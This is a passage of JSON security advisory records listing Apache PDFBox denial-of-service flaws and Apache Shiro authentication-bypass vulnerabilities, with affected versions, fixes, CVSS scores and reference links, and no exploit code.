"database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2022-06-29T18:54:14Z", "nvd_published_at": "2018-07-03T20:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7grw-6pjh-jpc9", "published": "2021-06-15T15:54:29Z", "modified": "2024-03-08T05:18:50.960251Z", "aliases": [ "CVE-2021-31812" ], "summary": "Infinite Loop in Apache PDFBox", "details": "In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7grw-6pjh-jpc9/GHSA-7grw-6pjh-jpc9.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox-parent", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7grw-6pjh-jpc9/GHSA-7grw-6pjh-jpc9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31812" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf251f6c358087107f8c23473468b279d59d50a75db6b4768165c78d3@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ab0ce69ce8aaff0773b8c1036438387ce004c2afc6f066626e205e@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ab0ce69ce8aaff0773b8c1036438387ce004c2afc6f066626e205e%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/06/12/1" } ], "database_specific": { "cwe_ids": [ "CWE-834", "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2021-06-14T19:41:33Z", "nvd_published_at": "2021-06-12T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fg3j-q579-v8x4", "published": "2021-06-15T15:54:32Z", "modified": "2024-03-08T05:34:54.801835Z", "aliases": [ "CVE-2021-31811" ], "summary": "Uncontrolled memory consumption", "details": "In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-fg3j-q579-v8x4/GHSA-fg3j-q579-v8x4.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox-parent", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-fg3j-q579-v8x4/GHSA-fg3j-q579-v8x4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31811" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf937c2236e6c79cdb99f76a70690dd345e53dbe0707cb506a202e43e@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/06/12/2" } ], "database_specific": { "cwe_ids": [ "CWE-770", "CWE-789" ], "github_reviewed": true, "github_reviewed_at": "2021-06-14T19:39:19Z", "nvd_published_at": "2021-06-12T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-26gr-cvq3-qxgf", "published": "2021-05-07T15:53:18Z", "modified": "2023-11-08T04:02:47.183256Z", "aliases": [ "CVE-2020-1957" ], "summary": "Improper Authentication in Apache Shiro", "details": "Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.2" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-26gr-cvq3-qxgf/GHSA-26gr-cvq3-qxgf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1957" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r17f371fc89d34df2d0c8131473fbc68154290e1be238895648f5a1e6%40%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb3982edf8bc8fcaa7a308e25a12d294fb4aac1f1e9d4e14fda639e77@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc64fb2336683feff3580c3c3a8b28e80525077621089641f2f386b63@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00014.html" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-05-06T20:05:12Z", "nvd_published_at": "2020-03-25T16:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2vgm-wxr3-6w2j", "published": "2021-05-07T15:54:23Z", "modified": "2024-03-15T05:20:51.873553Z", "aliases": [ "CVE-2020-13933" ], "summary": "Authentication bypass in Apache Shiro", "details": "Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.6.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-2vgm-wxr3-6w2j/GHSA-2vgm-wxr3-6w2j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13933" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00002.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re25b8317b00a50272a7252c4552cf1a81a97984cc2111ef7728e48e0@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5edf49cd1451475dbcf53826ba6ef1bb7872dd6493d6112eb0c2bad@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb47d88af224e396ee34ffb88ee99fb6d04510de5722cf14b7137e6bc@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ea6d8560d6354d41433ad006069904f0ed083527aa348b5999261a7@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d93dfb5df016b1a71a808486bc8f9fbafebbdbc8533625f91253f1d@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r852971e28f54cafa7d325bd7033115c67d613b112a2a1076817390ac@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8097b81905f2a113ebdf925bcbc6d8c9d6863c807c9ee42e1e7c9293@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70b907ccb306e9391145e2b10f56cc6914a245f91720a17a486c020a@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70098e336d02047ce4d4e69293fe8d558cd68cde06f6430398959bc4@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ea0224c1971a91dc6ade1f22508119a9c3bd56cef656f0c44bbfabb@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r575301804bfac87a064359cf4b4ae9d514f2d10db7d44120765f4129@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r539f87706094e79c5da0826030384373f0041068936912876856835f%40%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4c1e1249e9e1acb868db0c80728c13f448d07333da06a0f1603c0a33@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4506cedc401d6b8de83787f8436aac83956e411d66848c84785db46d@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r18b45d560d76c4260813c802771cc9678aa651fb8340e09366bfa198@%3Cdev.geode.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-05-05T21:37:50Z", "nvd_published_at": "2020-08-17T21:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-45x9-q6vj-cqgq", "published": "2022-10-12T12:00:16Z", "modified": "2024-02-16T07:57:10.787044Z", "aliases": [ "CVE-2022-40664" ], "summary": "Apache Shiro Authentication Bypass vulnerability", "details": "Apache Shiro before 1.10.0, Authentication Bypass Vulnerability in Shiro when forwarding or including via RequestDispatcher.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.10.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-45x9-q6vj-cqgq/GHSA-45x9-q6vj-cqgq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40664" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread/loc2ktxng32xpy7lfwxto13k4lvnhjwg" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221118-0005" }, { "type": "WEB", "url": "https://shiro.apache.org/blog/2022/10/10/2022/apache-shiro-1101-released.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/12/1" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/12/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/13/1" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2022-10-12T19:43:15Z", "nvd_published_at": "2022-10-12T07:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4cf5-xmhp-3xj7", "published": "2022-06-30T00:00:41Z", "modified": "2023-11-08T04:09:36.762135Z", "aliases": [ "CVE-2022-32532" ], "summary": "Improper Authorization in Apache Shiro", "details": "Apache Shiro before 1.9.1, A RegexRequestMatcher can be misconfigured to be bypassed on some servlet containers. Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.9.1" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/06/GHSA-4cf5-xmhp-3xj7/GHSA-4cf5-xmhp-3xj7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32532" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh" } ], "database_specific": { "cwe_ids": [ "CWE-285", "CWE-863" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:52:31Z", "nvd_published_at": "2022-06-29T00:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-72w9-fcj5-3fcg", "published": "2021-05-07T15:53:10Z", "modified": "2023-11-08T04:02:08.916630Z", "aliases": [ "CVE-2020-11989" ], "summary": "Improper Authentication in Apache Shiro", "details": "Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management. Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.3" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-72w9-fcj5-3fcg/GHSA-72w9-fcj5-3fcg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11989" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r408fe60bc8fdfd7c74135249d646d7abadb807ebf90f6fd2b014df21@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675%40%3Cuser.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cuser.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcf3d8041e1232201fe5d74fc612a193e435784d64002409b448b58fe@%3Cdev.geode.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-05-06T20:07:20Z", "nvd_published_at": "2020-06-22T19:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f6jp-j6w3-w9hm", "published": "2021-09-20T20:18:11Z", "modified": "2024-02-19T05:32:19.684337Z", "aliases": [ "CVE-2021-41303" ], "summary": "Apache Shiro vulnerable to a specially crafted HTTP request causing an authentication bypass", "details": "Apache Shiro before 1.8.0, when using Apache Shiro with Spring Boot, a specially crafted HTTP request may cause an authentication bypass. Users should update to Apache Shiro 1.8.0.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.8.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-f6jp-j6w3-w9hm/GHSA-f6jp-j6w3-w9hm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41303" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raae98bb934e4bde304465896ea02d9798e257e486d04a42221e2c41b@%3Cuser.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re470be1ffea44bca28ccb0e67a4cf5d744e2d2b981d00fdbbf5abc13%40%3Cannounce.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220609-0001" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-09-20T19:17:39Z", "nvd_published_at": "2021-09-17T09:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jc7h-c423-mpjc", "published": "2024-01-15T12:30:19Z", "modified": "2025-11-04T17:28:02.653382Z", "aliases": [ "CVE-2023-46749" ], "summary": "Apache Shiro vulnerable to path traversal", "details": "Apache Shiro before 1.130 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting \n\nMitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.13.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.10.0", "1.10.1", "1.11.0", "1.12.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-jc7h-c423-mpjc/GHSA-jc7h-c423-mpjc.json" } }, { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0alpha1" }, { "fixed": "2.0.0-alpha4" } ] } ], "versions": [ "2.0.0-alpha-1", "2.0.0-alpha-2", "2.0.0-alpha-3" ], "database_specific": { "last_known_affected_version_range": "\u003c 2.0.0alpha4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-jc7h-c423-mpjc/GHSA-jc7h-c423-mpjc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46749" }, { "type": "WEB", "url": "https://lists.apache.org/thread/mdv7ftz7k4488rzloxo2fb0p9shnp9wm" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2024-01-16T20:34:50Z", "nvd_published_at": "2024-01-15T10:15:26Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p836-389h-j692", "published": "2022-05-14T02:46:17Z", "modified": "2025-10-22T19:25:56.524449Z", "aliases": [ "CVE-2016-4437" ], "summary": "Improper Access Control in Apache Shiro", "details": "Apache Shiro before 1.2.5, when a cipher key has not been configured for the \"remember me\" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.", "affected": [ { "package": { "name": 